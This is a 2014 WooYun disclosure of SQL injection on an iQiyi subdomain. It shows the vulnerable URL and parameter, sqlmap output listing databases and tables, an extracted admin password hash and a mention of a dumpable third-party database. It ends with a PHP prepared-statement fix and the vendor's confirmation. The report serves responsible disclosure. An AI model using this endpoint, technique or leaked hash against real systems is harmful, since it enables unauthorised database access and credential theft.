Vulnerability summary

Defect ID: wooyun-2014-048691

Title: SQL injection vulnerability on an iQiyi sub-site

Vendor: iQiyi

Author: IT P民

Submitted: 2014-01-12 22:05

Fixed: 2014-02-26 22:06

Published: 2014-02-26 22:06

Vulnerability type: SQL injection

Severity: Low

Self-assessed Rank: 5

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-01-12: Details sent to the vendor, awaiting vendor action
2014-01-12: Vendor confirmed; details disclosed to the vendor only
2014-01-22: Details disclosed to core white hats and domain experts
2014-02-01: Details disclosed to regular white hats
2014-02-11: Details disclosed to intern white hats
2014-02-26: Details disclosed to the public

Brief description:

Looks like a low-value finding and I did not dig further, but the application connects to MySQL as root, which is definitely dangerous.

Detailed description:

Affected URL
http://tcl.iqiyi.com/index.php?action=daoyanjianjie&id=14
Retrieving the current user

[23:27:01] [INFO] testing MySQL
[23:27:01] [INFO] confirming MySQL
[23:27:01] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL >= 5.0.0
[23:27:01] [INFO] fetching current user
current user: 'root@localhost'


Retrieving the database names

[23:22:45] [INFO] fetching database names
[23:22:45] [INFO] the SQL query used returns 14 entries
[23:22:45] [INFO] resumed: "information_schema"
[23:22:45] [INFO] resumed: "ccs"
[23:22:45] [INFO] resumed: "cmdb_vip"
[23:22:45] [INFO] resumed: "common_cms"
[23:22:45] [INFO] resumed: "hk"
[23:22:45] [INFO] resumed: "ims"
[23:22:45] [INFO] resumed: "mysql"
[23:22:45] [INFO] resumed: "suc"
[23:22:45] [INFO] resumed: "t_eye"
[23:22:45] [INFO] resumed: "tcl"
[23:22:45] [INFO] resumed: "tcl_test"
[23:22:45] [INFO] resumed: "test"
[23:22:45] [INFO] resumed: "weixin"
[23:22:45] [INFO] resumed: "wx"
available databases [14]:
[*] ccs
[*] cmdb_vip
[*] common_cms
[*] hk
[*] ims
[*] information_schema
[*] mysql
[*] suc
[*] t_eye
[*] tcl
[*] tcl_test
[*] test
[*] weixin
[*] wx


Retrieving all tables of one database

[23:11:11] [INFO] starting 10 threads
[23:11:12] [INFO] retrieved: "tp_article"
[23:11:12] [INFO] retrieved: "tp_areply"
[23:11:12] [INFO] retrieved: "tp_access"
[23:11:12] [INFO] retrieved: "tp_flash"
[23:11:13] [INFO] retrieved: "tp_follow"
[23:11:13] [INFO] retrieved: "tp_adma"
[23:11:13] [INFO] retrieved: "tp_call"
[23:11:13] [INFO] retrieved: "tp_diymen_class"
[23:11:13] [INFO] retrieved: "tp_case"
[23:11:13] [INFO] retrieved: "tp_home"
[23:11:13] [INFO] retrieved: "tp_api"
[23:11:13] [INFO] retrieved: "tp_company"
[23:11:13] [INFO] retrieved: "tp_host"
[23:11:13] [INFO] retrieved: "tp_host_order"
[23:11:13] [INFO] retrieved: "tp_diymen_set"
[23:11:14] [INFO] retrieved: "tp_host_list_add"
[23:11:14] [INFO] retrieved: "tp_indent"
[23:11:14] [INFO] retrieved: "tp_function"
[23:11:14] [INFO] retrieved: "tp_lottery"
[23:11:14] [INFO] retrieved: "tp_keyword"
[23:11:14] [INFO] retrieved: "tp_classify"
[23:11:14] [INFO] retrieved: "tp_member_card_coupon"
[23:11:14] [INFO] retrieved: "tp_member_card_contact"
[23:11:14] [INFO] retrieved: "tp_member_card_create"
[23:11:14] [INFO] retrieved: "tp_dream"
[23:11:14] [INFO] retrieved: "tp_img"
[23:11:14] [INFO] retrieved: "tp_member_card_exchange"
[23:11:14] [INFO] retrieved: "tp_member"
[23:11:14] [INFO] retrieved: "tp_member_card_info"
[23:11:14] [INFO] retrieved: "tp_member_card_sign"
[23:11:15] [INFO] retrieved: "tp_member_card_vip"
[23:11:15] [INFO] retrieved: "tp_member_card_set"
[23:11:15] [INFO] retrieved: "tp_member_card_integral"


Retrieved the hashed admin password; it is fairly hard to crack, so this counts as a fairly low-value SQL injection.

[01:54:56] [INFO] fetching SQL SELECT statement query output: 'select user_pass from tcl.admin'
[01:54:56] [INFO] the SQL query used returns 1 entries
[01:54:56] [INFO] retrieved: "1c161ff0c3892f845d0cb4928287753e"
select user_pass from tcl.admin; [1]:
[*] 1c161ff0c3892f845d0cb4928287753e


This host does not appear to belong to iQiyi, but it uses an iQiyi subdomain, so I am reporting it to iQiyi.
Another company's database, weixin, happens to sit on the same host; it can be dumped, and its usernames, passwords and so on are visible.

[Screenshot: QQ20140112-5.png]


Proof of vulnerability:

Retrieved the hashed admin password; it is fairly hard to crack, so this counts as a fairly low-value SQL injection.

[01:54:56] [INFO] fetching SQL SELECT statement query output: 'select user_pass from tcl.admin'
[01:54:56] [INFO] the SQL query used returns 1 entries
[01:54:56] [INFO] retrieved: "1c161ff0c3892f845d0cb4928287753e"
select user_pass from tcl.admin; [1]:
[*] 1c161ff0c3892f845d0cb4928287753e

Fix recommendation:

Filter the parameters.

Copyright notice: please credit the source when reposting: IT P民@WooYun
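As an added illustration of the recommended fix, not code from the affected site or from the report author: the vulnerable pattern is a PHP handler that builds a query from the `id` parameter of `index.php?action=daoyanjianjie&id=14`. The version below validates the parameter shape, binds it through a PDO prepared statement so the value never becomes part of the SQL text, and connects with a schema-limited account instead of `root@localhost` (the current user sqlmap reported). The table name `tp_article` is taken from the table list above; the column names, DSN, account and password are assumptions. The code avoids PHP 7 syntax so it also matches the PHP 5.3 stack identified in the output.

```php
<?php
// Added example, not the site's code. Hardened handler for
// index.php?action=...&id=... on a PHP/MySQL stack.
// Assumed: table tcl.tp_article with columns id, title, body;
// DSN, user and password are placeholders.

function loadArticle(PDO $db, $rawId)
{
    // 1. Validate the input shape before it goes anywhere near SQL:
    //    only a positive integer of reasonable length is accepted.
    //    Rejecting is safer than "filtering" characters out of bad input.
    if (!is_string($rawId) || !preg_match('/^[1-9][0-9]{0,9}$/', $rawId)) {
        return null;
    }
    $id = (int) $rawId;

    // 2. Parameterize the query. With emulated prepares disabled the
    //    statement text and the value travel to MySQL separately, so
    //    no input can alter the query structure.
    $stmt = $db->prepare(
        'SELECT id, title, body FROM tp_article WHERE id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return ($row === false) ? null : $row;
}

// 3. Least privilege: a dedicated application account that can only read
//    and write the tcl schema, so an injection elsewhere cannot reach
//    mysql.*, weixin.* or the other databases on the same server.
$db = new PDO(
    'mysql:host=127.0.0.1;dbname=tcl;charset=utf8',  // placeholder DSN
    'tcl_app',                                        // placeholder account
    'REPLACE_WITH_SECRET',                            // placeholder password
    array(
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    )
);

$rawId   = isset($_GET['id']) ? $_GET['id'] : '';
$article = loadArticle($db, $rawId);

if ($article === null) {
    // Unknown or malformed id: a plain 404, no database error text leaks
    // back to the client (sqlmap's MySQL fingerprint above came from
    // exactly that kind of feedback).
    header('HTTP/1.1 404 Not Found');
    exit;
}

// Output encoding for the HTML context.
echo htmlspecialchars($article['title'], ENT_QUOTES, 'UTF-8');
```

The application account is created on the MySQL side with a grant limited to the one schema, for example `GRANT SELECT, INSERT, UPDATE, DELETE ON tcl.* TO 'tcl_app'@'localhost'` (account name assumed), after which `SELECT user()` from the application should no longer return `root@localhost`. Setting `ATTR_ERRMODE` to exceptions and catching them in a global handler that logs server-side but returns a generic error page removes the verbose database messages that injection tools rely on for fingerprinting and error-based extraction.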


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-01-12 22:26

Vendor reply:

Thank you for the vulnerability report; we will expedite the fix!

Latest status:

None yet

